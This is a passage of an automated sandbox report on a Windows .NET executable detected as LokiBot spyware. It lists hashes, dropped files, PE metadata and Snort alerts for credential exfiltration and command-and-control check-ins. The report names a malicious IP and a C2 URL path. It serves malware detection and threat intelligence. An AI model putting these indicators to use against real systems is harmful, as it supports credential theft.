                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.urwpp.deDPleaseConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.commiConan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zhongyicts.com.cnConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cngConan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cnFkConan Fegan - Aluminium.exe, 00000000.00000003.636140982.0000000005B5E000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sakkal.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          203.170.84.89
                                          unknownAustralia
                                          38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:356211
                                          Start date:22.02.2021
                                          Start time:19:12:10
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 6m 43s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:Conan Fegan - Aluminium.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:17
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@3/3@88/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 90% (good quality ratio 86.4%)
                                          • Quality average: 77%
                                          • Quality standard deviation: 28.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • HTTP Packets have been reduced
                                          • TCP Packets have been reduced to 100
                                          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 23.54.113.53, 168.61.161.212, 40.88.32.150, 51.104.139.180, 52.155.217.156, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.104.144.132, 92.122.213.194, 92.122.213.247, 51.11.168.160
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356211/sample/Conan Fegan - Aluminium.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          19:12:58API Interceptor86x Sleep call for process: Conan Fegan - Aluminium.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          203.170.84.89IMG-2021-17-02557000015.gz.exeGet hashmaliciousBrowse
                                          • www.ritcophysiotherapy.com.au/wap121/five/fre.php

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          www.ritcophysiotherapy.com.auIMG-2021-17-02557000015.gz.exeGet hashmaliciousBrowse
                                          • 203.170.84.89

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUDHL Document. PDF.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          urgent specification request.exeGet hashmaliciousBrowse
                                          • 27.54.83.1
                                          IMG-2021-17-02557000015.gz.exeGet hashmaliciousBrowse
                                          • 203.170.84.89
                                          Purchase Enquiry.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          BELZONA Specification.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          Shipment Document-REF-INV_Pdf.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          q5oRsfy1vk.exeGet hashmaliciousBrowse
                                          • 103.67.235.120
                                          Client.vbsGet hashmaliciousBrowse
                                          • 203.170.80.250
                                          Copy_#_824.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Copy_#_824.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Copy_#_824.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Notification #591501.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Note #83008.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Notification #591501.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Notification #591501.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Scan 108.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Scan 108.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          Scan 108.xlsGet hashmaliciousBrowse
                                          • 203.170.84.193
                                          inv.exeGet hashmaliciousBrowse
                                          • 203.170.80.250
                                          https://nimb.ws/10IXxlGet hashmaliciousBrowse
                                          • 103.28.48.147

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Conan Fegan - Aluminium.exe.log
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                          MD5:69206D3AF7D6EFD08F4B4726998856D3
                                          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                          C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: 1
                                          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16054
                                          Entropy (8bit):0.6032389203630698
                                          Encrypted:false
                                          SSDEEP:12:4/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/gc:s
                                          MD5:E9856AAF2BC6ABAAE1AA2CC5F0CC660D
                                          SHA1:86D357DD16FB79826BE759815CD9C0487873B899
                                          SHA-256:F48ADD5B1FBF19A72C9BC8F98DAB0EFB099E2DFC573F3996410836A8491DFE08
                                          SHA-512:FD969883E96613993D240F9E7C233734B94A7B730B6618BE15D62730F739E829554FC70156818BD42EBEC3D2E1465B5F76230459348254C15C3E67ED962AD366
                                          Malicious:false
                                          Reputation:low
                                          Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.251631180417383
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Conan Fegan - Aluminium.exe
                                          File size:398848
                                          MD5:708ee64939578fbb07010e20f6c7672c
                                          SHA1:335dc9a9142b528848b8446be2afda844f6d673f
                                          SHA256:f1a43d8b49bda3c88eb1c314c9460a92c0b467ea8db4c9086ac8e3bfe358e511
                                          SHA512:0760e722df49e3a10b26320b54648029c1d7e2862bca7f1bc4d9a60cf9a46a6d847eb3a86825ea1faa59aaa93725d601cee8c3167f4a8fe01ff4454e823fec9a
                                          SSDEEP:6144:cHxKPS22Xs/zVtvkuv4O+IpTXeUJ/K5Yd1OpGLFGY1bON94r:cfXs/vV+IFLiA4Q4Y1bDr
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.3`..............P..............*... ...@....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x462ae6
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x6033CE41 [Mon Feb 22 15:31:13 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x62a940x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x5e0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x60aec0x60c00False0.710743196867data7.26782540442IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0x640000x5e00x600False0.431640625data4.16085866295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x660000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0x640900x350data
                                          RT_MANIFEST0x643f00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyrightCopyright Microsoft 2014
                                          Assembly Version1.0.0.0
                                          InternalNameCallConvCdecl.exe
                                          FileVersion1.0.0.0
                                          CompanyNameMicrosoft
                                          LegalTrademarks
                                          Comments
                                          ProductNameWinClient
                                          ProductVersion1.0.0.0
                                          FileDescriptionWinClient
                                          OriginalFilenameCallConvCdecl.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          02/22/21-19:13:02.072161TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974580192.168.2.4203.170.84.89
                                          02/22/21-19:13:02.072161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.4203.170.84.89
                                          02/22/21-19:13:02.072161TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.4203.170.84.89
                                          02/22/21-19:13:03.456111TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974780192.168.2.4203.170.84.89
                                          02/22/21-19:13:03.456111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.4203.170.84.89
                                          02/22/21-19:13:03.456111TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.4203.170.84.89
                                          02/22/21-19:13:04.676480TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.4203.170.84.89
                                          02/22/21-19:13:04.676480TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.4203.170.84.89
                                          02/22/21-19:13:04.676480TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.4203.170.84.89
                                          02/22/21-19:13:06.053559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.4203.170.84.89
                                          02/22/21-19:13:06.053559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.4203.170.84.89
                                          02/22/21-19:13:06.053559TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.4203.170.84.89
                                          02/22/21-19:13:07.581441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.4203.170.84.89
                                          02/22/21-19:13:07.581441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.4203.170.84.89
                                          02/22/21-19:13:07.581441TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.4203.170.84.89
                                          02/22/21-19:13:09.379899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.4203.170.84.89
                                          02/22/21-19:13:09.379899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.4203.170.84.89
                                          02/22/21-19:13:09.379899TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.4203.170.84.89
                                          02/22/21-19:13:10.753898TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.4203.170.84.89
                                          02/22/21-19:13:10.753898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.4203.170.84.89
                                          02/22/21-19:13:10.753898TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.4203.170.84.89
                                          02/22/21-19:13:12.128792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.4203.170.84.89
                                          02/22/21-19:13:12.128792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.4203.170.84.89
                                          02/22/21-19:13:12.128792TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.4203.170.84.89
                                          02/22/21-19:13:13.445902TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.4203.170.84.89
                                          02/22/21-19:13:13.445902TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.4203.170.84.89
                                          02/22/21-19:13:13.445902TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.4203.170.84.89
                                          02/22/21-19:13:14.755155TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.4203.170.84.89
                                          02/22/21-19:13:14.755155TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.4203.170.84.89
                                          02/22/21-19:13:14.755155TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.4203.170.84.89
                                          02/22/21-19:13:16.098574TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.4203.170.84.89
                                          02/22/21-19:13:16.098574TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.4203.170.84.89
                                          02/22/21-19:13:16.098574TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.4203.170.84.89
                                          02/22/21-19:13:17.407438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.4203.170.84.89
                                          02/22/21-19:13:17.407438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.4203.170.84.89
                                          02/22/21-19:13:17.407438TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.4203.170.84.89
                                          02/22/21-19:13:18.738997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.4203.170.84.89
                                          02/22/21-19:13:18.738997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.4203.170.84.89
                                          02/22/21-19:13:18.738997TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.4203.170.84.89
                                          02/22/21-19:13:20.041935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.4203.170.84.89
                                          02/22/21-19:13:20.041935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.4203.170.84.89
                                          02/22/21-19:13:20.041935TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.4203.170.84.89
                                          02/22/21-19:13:21.333542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.4203.170.84.89
                                          02/22/21-19:13:21.333542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.4203.170.84.89
                                          02/22/21-19:13:21.333542TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.4203.170.84.89
                                          02/22/21-19:13:22.669300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.4203.170.84.89
                                          02/22/21-19:13:22.669300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.4203.170.84.89
                                          02/22/21-19:13:22.669300TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.4203.170.84.89
                                          02/22/21-19:13:24.013553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.4203.170.84.89
                                          02/22/21-19:13:24.013553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.4203.170.84.89
                                          02/22/21-19:13:24.013553TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.4203.170.84.89
                                          02/22/21-19:13:25.353621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.4203.170.84.89
                                          02/22/21-19:13:25.353621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.4203.170.84.89
                                          02/22/21-19:13:25.353621TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.4203.170.84.89
                                          02/22/21-19:13:26.968743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.4203.170.84.89
                                          02/22/21-19:13:26.968743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.4203.170.84.89
                                          02/22/21-19:13:26.968743TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.4203.170.84.89
                                          02/22/21-19:13:28.278128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.4203.170.84.89
                                          02/22/21-19:13:28.278128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.4203.170.84.89
                                          02/22/21-19:13:28.278128TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.4203.170.84.89
                                          02/22/21-19:13:29.579659TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.4203.170.84.89
                                          02/22/21-19:13:29.579659TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.4203.170.84.89
                                          02/22/21-19:13:29.579659TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.4203.170.84.89
                                          02/22/21-19:13:30.894738TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.4203.170.84.89
                                          02/22/21-19:13:30.894738TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.4203.170.84.89
                                          02/22/21-19:13:30.894738TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.4203.170.84.89
                                          02/22/21-19:13:32.184419TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.4203.170.84.89
                                          02/22/21-19:13:32.184419TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.4203.170.84.89
                                          02/22/21-19:13:32.184419TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.4203.170.84.89
                                          02/22/21-19:13:33.518152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.4203.170.84.89
                                          02/22/21-19:13:33.518152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.4203.170.84.89
                                          02/22/21-19:13:33.518152TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.4203.170.84.89
                                          02/22/21-19:13:34.813981TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.4203.170.84.89
                                          02/22/21-19:13:34.813981TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.4203.170.84.89
                                          02/22/21-19:13:34.813981TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.4203.170.84.89
                                          02/22/21-19:13:36.095387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.4203.170.84.89
                                          02/22/21-19:13:36.095387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.4203.170.84.89
                                          02/22/21-19:13:36.095387TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.4203.170.84.89
                                          02/22/21-19:13:37.374892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.4203.170.84.89
                                          02/22/21-19:13:37.374892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.4203.170.84.89
                                          02/22/21-19:13:37.374892TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.4203.170.84.89
